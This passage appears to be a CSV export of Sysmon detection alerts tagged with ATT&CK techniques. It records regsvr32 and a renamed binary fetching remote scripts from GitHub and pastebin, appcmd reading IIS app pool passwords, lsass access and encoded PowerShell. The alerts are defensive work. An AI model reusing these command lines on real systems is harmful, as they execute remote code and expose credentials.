<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>10</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>10</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:10:03.991455Z"">
</TimeCreated>
<EventRecordID>4442</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""344"" ThreadID=""2032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 19:10:02.068</Data>
<Data Name=""SourceProcessGUID"">365ABB72-9B85-5C8E-0000-0010C4CC1200</Data>
<Data Name=""SourceProcessId"">3576</Data>
<Data Name=""SourceThreadId"">3620</Data>
<Data Name=""SourceImage"">C:\Windows\system32\taskmgr.exe</Data>
<Data Name=""TargetProcessGUID"">365ABB72-0886-5C8F-0000-001030560000</Data>
<Data Name=""TargetProcessId"">476</Data>
<Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
<Data Name=""GrantedAccess"">0x1fffff</Data>
<Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:48:52.766629Z"">
</TimeCreated>
<EventRecordID>16840</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""108"" ThreadID=""1268"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:48:52.344</Data>
<Data Name=""ProcessGuid"">365ABB72-6A94-5CD8-0000-0010C2F10E00</Data>
<Data Name=""ProcessId"">3880</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-695E-5CD8-0000-002015370100</Data>
<Data Name=""LogonId"">0x13715</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6A94-5CD8-0000-00101BDB0E00</Data>
<Data Name=""ParentProcessId"">1340</Data>
<Data Name=""ParentImage"">C:\ProgramData\jabber.exe</Data>
<Data Name=""ParentCommandLine"">jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.971708Z"">
</TimeCreated>
<EventRecordID>5907</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.931</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00108C7FFF00</Data>
<Data Name=""ProcessId"">3196</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:56:08.370067Z"">
</TimeCreated>
<EventRecordID>13</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1086,technique_name=PowerShell</Data>
<Data Name=""UtcTime"">2019-04-18 16:56:08.340</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">Powershell</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC01-5CB8-0000-0010BB7E0700</Data>
<Data Name=""ParentProcessId"">1196</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;cmd.exe&quot; /s /k pushd &quot;C:\Users\IEUser\Desktop&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
</TimeCreated>
<EventRecordID>18851</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""1636"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
<Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
<Data Name=""ProcessId"">2600</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
<Data Name=""LogonId"">0x13531</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
<Data Name=""ParentProcessId"">964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
</TimeCreated>
<EventRecordID>18851</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""1636"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
<Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
<Data Name=""ProcessId"">2600</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
<Data Name=""LogonId"">0x13531</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
<Data Name=""ParentProcessId"">964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
</TimeCreated>
<EventRecordID>18851</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""1636"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
<Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
<Data Name=""ProcessId"">2600</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
<Data Name=""LogonId"">0x13531</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
<Data Name=""ParentProcessId"">964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.891593Z"">
</TimeCreated>
<EventRecordID>5904</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.851</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010C47BFF00</Data>
<Data Name=""ProcessId"">560</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.632117Z"">
</TimeCreated>
<EventRecordID>6192</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.612</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001015780C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe</Data>
<Data Name=""FileVersion"">?</Data>
<Data Name=""Description"">?</Data>
<Data Name=""Product"">?</Data>
<Data Name=""Company"">?</Data>
<Data Name=""CommandLine"">\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6C-5CEB-0000-00104A170C00</Data>
<Data Name=""ParentProcessId"">3680</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.632117Z"">
</TimeCreated>
<EventRecordID>6192</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.612</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001015780C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe</Data>
<Data Name=""FileVersion"">?</Data>
<Data Name=""Description"">?</Data>
<Data Name=""Product"">?</Data>
<Data Name=""Company"">?</Data>
<Data Name=""CommandLine"">\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6C-5CEB-0000-00104A170C00</Data>
<Data Name=""ParentProcessId"">3680</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( &quot;C:\Windows\system32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:01:51.007950Z"">
</TimeCreated>
<EventRecordID>16498</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:01:50.852</Data>
<Data Name=""ProcessGuid"">365ABB72-517E-5CD8-0000-00105FE01700</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
